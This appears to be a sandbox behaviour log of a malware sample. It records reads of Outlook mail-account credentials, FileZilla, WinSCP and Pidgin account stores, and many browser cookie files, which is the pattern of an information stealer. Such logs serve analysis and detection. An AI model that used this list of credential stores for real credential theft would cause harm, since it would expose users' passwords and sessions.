Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP Server, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Password, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = Email, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = Email, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, size = 83, size_out = 83 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, size = 551, size_out = 551 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, size = 241, size_out = 241 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, size = 111, size_out = 111 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, size = 110, size_out = 110 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, size = 276, size_out = 276 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, size = 86, size_out = 86 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, size = 414, size_out = 414 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, size = 414, size_out = 414 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, size = 102, size_out = 102 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, size = 102, size_out = 102 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, size = 93, size_out = 93 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, size = 234, size_out = 234 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, size = 578, size_out = 578 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, size = 101, size_out = 101 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, size = 82, size_out = 82 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, size = 293, size_out = 293 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, size = 221, size_out = 221 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, size = 513, size_out = 513 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, size = 490, size_out = 490 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, size = 456, size_out = 456 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, size = 130, size_out = 130 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, size = 272, size_out = 272 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, type = size, size_out = 0 True 1
Fn
